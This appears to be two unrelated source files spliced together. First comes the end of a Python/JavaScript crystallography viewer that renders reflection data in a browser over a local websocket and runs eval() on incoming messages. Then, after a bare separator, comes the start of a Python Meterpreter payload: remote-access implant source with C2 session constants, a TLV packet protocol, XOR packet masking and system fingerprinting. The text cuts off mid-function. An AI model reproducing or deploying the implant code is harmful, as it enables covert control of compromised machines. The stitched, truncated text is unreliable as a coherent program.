console.log('WebSocket Error ' + error);
};
window.addEventListener( 'resize',
function( event ){
stage.handleResize();
},
false
);
var stage;
var shape;
var shapeComp;
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
var ttips = [];
var current_ttip = "";
var positions = [];
var br_positions = [];
var br_colours = [];
var br_radii = [];
var br_ttips = [];
var colours = [];
var radii = [];
var shapebufs = [];
var br_shapebufs = [];
var nrots = 0;
function createElement(name, properties, style)
{
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name);
Object.assign(el, properties);
Object.assign(el.style, style);
Object.assign(el.style,
{
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
);
return el;
}
function addElement(el)
{
// utility function used in for loop over colourgradvalarray
Object.assign(el.style,
{
position: "absolute",
zIndex: 10
}
);
stage.viewer.container.appendChild(el);
}
function addDivBox(txt, t, l, w, h, bgcolour='rgba(255.0, 255.0, 255.0, 0.0)')
{
divbox = createElement("div",
{
innerText: txt
},
{
backgroundColor: bgcolour,
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: t.toString() + "px",
left: l.toString() + "px",
width: w.toString() + "px",
height: h.toString() + "px",
}
);
addElement(divbox);
}
// define tooltip element
var tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, 0.75)",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
%s
var hklscene = function()
{
shape = new NGL.Shape('shape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
MakeHKL_Axis();
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update();
// if some radii are negative draw them with wireframe
%s
//colourgradvalarrays
%s
var ih = 3,
topr = 35,
topr2 = 10,
lp = 10,
wp = 40,
lp2 = lp + wp,
gl = 3,
wp2 = gl,
fomlabelheight = 25;
if (colourgradvalarray.length === 1)
{
wp2 = 15;
fomlabelheight = 0;
}
var wp3 = wp + colourgradvalarray.length * wp2 + 2;
totalheight = ih*colourgradvalarray[0].length + 35 + fomlabelheight;
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals as well as label legend of
// the displayed miller array
addDivBox("", topr2, lp, wp3, totalheight, 'rgba(255.0, 255.0, 255.0, 1.0)');
// print label of the miller array used for colouring
addDivBox("%s", topr2, lp, wp, 20);
if (colourgradvalarray.length > 1)
{
// print FOM label, 1, 0.5 and 0.0 values below colour chart
fomtop = topr2 + totalheight - 18;
fomlp = lp + wp;
fomwp = wp3;
fomtop2 = fomtop - 13;
// print the 1 number
addDivBox("1", fomtop2, fomlp, fomwp, 20);
// print the 0.5 number
leftp = fomlp + 0.48 * gl * colourgradvalarray.length;
addDivBox("0.5", fomtop2, leftp, fomwp, 20);
// print the FOM label
addDivBox("%s", fomtop, fomlp, fomwp, 20);
// print the 0 number
leftp = fomlp + 0.96 * gl * colourgradvalarray.length;
addDivBox("0", fomtop2, leftp, fomwp, 20);
}
for (j = 0; j < colourgradvalarray[0].length; j++)
{
rgbcol = colourgradvalarray[0][j][1];
val = colourgradvalarray[0][j][0];
topv = j*ih + topr;
toptxt = topv - 5;
// print value of miller array if present in colourgradvalarray[0][j][0]
addDivBox(val, toptxt, lp, wp, ih);
}
// draw the colour gradient
for (g = 0; g < colourgradvalarray.length; g++)
{
leftp = g*gl + lp + wp;
// if FOM values are supplied draw colour gradients with decreasing
// saturation values as stored in the colourgradvalarray[g] arrays
for (j = 0; j < colourgradvalarray[g].length; j++)
{
rgbcol = colourgradvalarray[g][j][1];
val = colourgradvalarray[g][j][0];
topv = j*ih + topr;
addDivBox("", topv, leftp, wp2, ih, rgbcol);
}
}
}
document.addEventListener('DOMContentLoaded', function() { hklscene() }, false );
mysocket.onmessage = function (e)
{
//alert('received:\\n' + e.data);
var c,
alpha,
si;
mysocket.send('\\n Browser: Got ' + e.data ); // tell server what it sent us
try
{
var datval = e.data.split(":\\n");
//alert('received2:\\n' + datval);
var msgtype = datval[0];
//alert('received3:\\n' + msgtype);
var val = datval[1].split(",");
if (msgtype === "alpha")
{
ibin = parseInt(val[0]);
alpha = parseFloat(val[1]);
shapebufs[ibin].setParameters({opacity: alpha});
for (var g=0; g < nrots; g++ )
br_shapebufs[ibin][g].setParameters({opacity: alpha});
stage.viewer.requestRender();
}
if (msgtype === "colour")
{
ibin = parseInt(val[0]);
si = parseInt(val[1]);
colours[ibin][3*si] = parseFloat(val[2]);
colours[ibin][3*si+1] = parseFloat(val[3]);
colours[ibin][3*si+2] = parseFloat(val[4]);
shapebufs[ibin].setAttributes({ color: colours[ibin] });
for (var g=0; g < nrots; g++ )
{
br_colours[ibin][3*si] = parseFloat(val[2]);
br_colours[ibin][3*si+1] = parseFloat(val[3]);
br_colours[ibin][3*si+2] = parseFloat(val[4]);
br_shapebufs[ibin][g].setAttributes({ color: br_colours[ibin] });
}
stage.viewer.requestRender();
}
if (msgtype === "ShowTooltip")
{
current_ttip = eval( String(val));
}
if (msgtype === "Redraw")
{
stage.viewer.requestRender();
}
if (msgtype === "ReOrient")
{
mysocket.send( 'Reorienting ' + pagename );
sm = new Float32Array(16);
//alert('ReOrienting: ' + val)
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j]);
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.requestRender();
}
if (msgtype === "Reload")
{
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
mysocket.send('Current vieworientation:\\n' + msg );
mysocket.send( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (msgtype.includes("Expand") )
{
mysocket.send( 'Expanding data...' );
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
br_positions = [];
br_colours = [];
br_radii = [];
br_ttips = [];
br_shapebufs = [];
//alert('rotations:\\n' + val);
strs = datval[1].split("\\n");
nbins = %d;
var Rotmat = new NGL.Matrix3();
var sm = new Float32Array(9);
var r = new NGL.Vector3();
for (var bin=0; bin<nbins; bin++)
{
var nsize = positions[bin].length/3;
var csize = nsize*3;
var nsize3 = nsize*3;
var anoexp = false;
if (msgtype.includes("Friedel") )
{
anoexp = true;
csize = nsize*6;
}
br_positions.push( [] );
br_shapebufs.push( [] );
br_colours.push( [] );
br_radii.push( [] );
br_ttips.push( [] );
br_colours[bin] = colours[bin];
br_radii[bin] = radii[bin];
if (anoexp)
{
var colarr = [];
var cl = colours[bin].length;
for (var i=0; i<cl; i++)
{
colarr[i] = colours[bin][i];
colarr[i+cl] = colours[bin][i];
}
br_colours[bin] = new Float32Array(colarr);
var radiiarr = [];
var rl = radii[bin].length;
for (var i=0; i<rl; i++)
{
radiiarr[i] = radii[bin][i];
radiiarr[i+rl] = radii[bin][i];
}
br_radii[bin] = new Float32Array(radiiarr);
}
nrots = 0;
for (var g=0; g < strs.length; g++ )
{
if (strs[g] < 1 )
continue;
nrots++;
br_positions[bin].push( [] );
br_shapebufs[bin].push( [] );
br_ttips[bin].push( [] );
br_ttips[bin][g] = ttips[bin].slice(); // deep copy with slice()
br_ttips[bin][g][0] = g;
br_positions[bin][g] = new Float32Array( csize );
var elmstrs = strs[g].split(",");
//alert('rot' + g + ': ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
Rotmat.fromArray(sm);
for (var i=0; i<nsize; i++)
{
idx= i*3;
r.x = positions[bin][idx];
r.y = positions[bin][idx+1];
r.z = positions[bin][idx+2];
r.applyMatrix3(Rotmat)
br_positions[bin][g][idx] = r.x;
br_positions[bin][g][idx + 1] = r.y;
br_positions[bin][g][idx + 2] = r.z;
if (anoexp)
{
r.negate(); // inversion for anomalous pair
br_positions[bin][g][nsize3 + idx] = r.x;
br_positions[bin][g][nsize3 + idx + 1] = r.y;
br_positions[bin][g][nsize3 + idx + 2] = r.z;
}
}
br_shapebufs[bin][g] = new NGL.SphereBuffer({
position: br_positions[bin][g],
color: br_colours[bin],
radius: br_radii[bin],
// g works as the id number of the rotation of applied symmetry operator when creating tooltip for an hkl
picking: br_ttips[bin][g],
});
shape.addBuffer(br_shapebufs[bin][g]);
}
}
MakeHKL_Axis();
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer42');
repr.update();
stage.viewer.requestRender();
mysocket.send( 'Expanded data' );
}
if (msgtype === "Testing")
{
// test something new
mysocket.send( 'Testing something new ' + pagename );
/*
var newradii = radii[0].map(function(element) {
return element*1.5;
});
shapebufs[0].setAttributes({
radius: newradii
})
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
*/
}
mysocket.send( 'Ready ' + pagename );
}
catch(err)
{
mysocket.send('error: ' + err.stack );
/*
msg = "";
for(var n=0; n<Object.getOwnPropertyNames(self).length; n++)
{
someKey = Object.getOwnPropertyNames(self)[n];
// We check if this key exists in the obj
var thisval = self[someKey];
if (Object(thisval) !== thisval) // only interested in primitive values, not objects
{
//varname = Object.keys({thisval:0} )[0]
msg = msg.concat( someKey + ': ' + String(self[someKey]) + '\\n');
}
}
mysocket.send('Variable values: ' + msg );
*/
}
};
""" % (self.__module__, self.__module__, axisfuncstr, self.camera_type, spherebufferstr, \
negativeradiistr, colourgradstrs, colourlabel, fomlabel, cntbin)
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
self.sceneisdirty = False
def OnConnectWebsocketClient(self, client, server):
#if not self.websockclient:
self.websockclient = client
self.mprint( "Browser connected:" + str( self.websockclient ) )
#else:
# self.mprint( "Unexpected browser connection was rejected" )
def OnWebsocketClientMessage(self, client, server, message):
try:
verb = self.verbose
if message != "":
if "Error:" in message:
verb = True
self.mprint( message, verb)
self.lastmsg = message
if "Current vieworientation:" in message:
# The NGL.Matrix4 with the orientation is a list of floats.
self.viewmtrxelms = message[ message.find("\n") + 1: ]
sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ) )
if not self.isnewfile:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.msgqueue.append( ("ReOrient", self.viewmtrxelms) )
self.isnewfile = False
if "tooltip_id:" in message:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
sym_id = eval(message.split("tooltip_id:")[1])[0]
id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
rotmx = None
if sym_id >= 0:
rotmx = self.symops[sym_id].r()
hkls = self.scene.indices
#ttip = self.tooltipstringsdict[hkls[id]]
self.mprint("tooltip for : " + str(hkls[id]))
if not is_friedel_mate:
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx)
ttip = self.GetTooltipOnTheFly(id, rotmx)
else:
# if id > len(hkls) then these hkls are added as the friedel mates during the
# "if (anoexp)" condition in the javascript code
id = id % len(hkls)
ttip = "id: %d" %id
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx, anomalous=True)
ttip = self.GetTooltipOnTheFly(id, rotmx, anomalous=True)
self.SendWebSockMsg("ShowTooltip", ttip)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10))
def WebBrowserMsgQueue(self):
try:
while True:
sleep(0.5)
if len(self.msgqueue):
pendingmessagetype, pendingmessage = self.msgqueue[0]
self.SendWebSockMsg(pendingmessagetype, pendingmessage)
self.msgqueue.remove( self.msgqueue[0] )
# if the html content is huge the browser will be unresponsive until it has finished
# reading the html content. This may crash this thread. So try restarting this thread until
# browser is ready
except Exception as e:
self.mprint( str(e) + ", Restarting WebBrowserMsgQueue")
self.WebBrowserMsgQueue()
def StartWebsocket(self):
self.server = WebsocketServer(7894, host='127.0.0.1')
if not self.server:
raise Sorry("Could not connect socket to web browser")
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.WebBrowserMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def SendWebSockMsg(self, msgtype, msg=""):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
message = u"" + msgtype + self.msgdelim + msg
if self.websockclient:
while not ("Ready" in self.lastmsg or "tooltip_id" in self.lastmsg):
sleep(0.5)
#self.lastmsg = ""
self.server.send_message(self.websockclient, message )
else:
self.OpenBrowser()
def SetOpacity(self, bin, alpha):
if bin > self.nbin:
self.mprint( "There are only %d bins of data present" %self.nbin, True )
return
msg = "%d, %f" %(bin, alpha)
self.SendWebSockMsg("alpha", msg)
def RedrawNGL(self):
#self.SendWebSockMsg("Redraw")
self.msgqueue.append( ("Redraw", "") )
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", True)
#self.SendWebSockMsg("Reload")
self.msgqueue.append( ("Reload", "") )
def OpenBrowser(self):
if not self.browserisopen:
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file://" + os.path.abspath( self.hklfname )
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname)
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.isnewfile = False
self.browserisopen = True
def ExpandInBrowser(self, P1=True, friedel_mate=True):
retmsg = "Not expanding in browser"
if self.sceneisdirty:
return retmsg
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if P1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ]
retmsg = "expanding to P1 in browser"
else:
unique_rot_ops = [ self.symops[0] ] # first one is the identity matrix
if friedel_mate:
msgtype += "Friedel"
retmsg = "expanding Friedel mates in browser"
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n"
#self.SendWebSockMsg(msgtype, msg)
self.msgqueue.append( (msgtype, msg) )
return retmsg
def TestNewFunction(self):
self.SendWebSockMsg("Testing")
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
meterpreter.py
|
#!/usr/bin/python
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
TRY_TO_FORK = True
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
HTTP_COOKIE = None
HTTP_HOST = None
HTTP_REFERER = None
PAYLOAD_UUID = ''
SESSION_GUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
# Packet header sizes
ENC_NONE = 0
PACKET_XOR_KEY_SIZE = 4
PACKET_SESSION_GUID_SIZE = 16
PACKET_ENCRYPT_FLAG_SIZE = 4
PACKET_LENGTH_SIZE = 4
PACKET_TYPE_SIZE = 4
PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE)
PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE)
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def debug_traceback(msg=None):
if DEBUGGING:
if msg:
print(msg)
traceback.print_exc(file=sys.stderr)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if family == socket.AF_INET6 and '%' in address:
address = address.split('%', 1)[0]
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
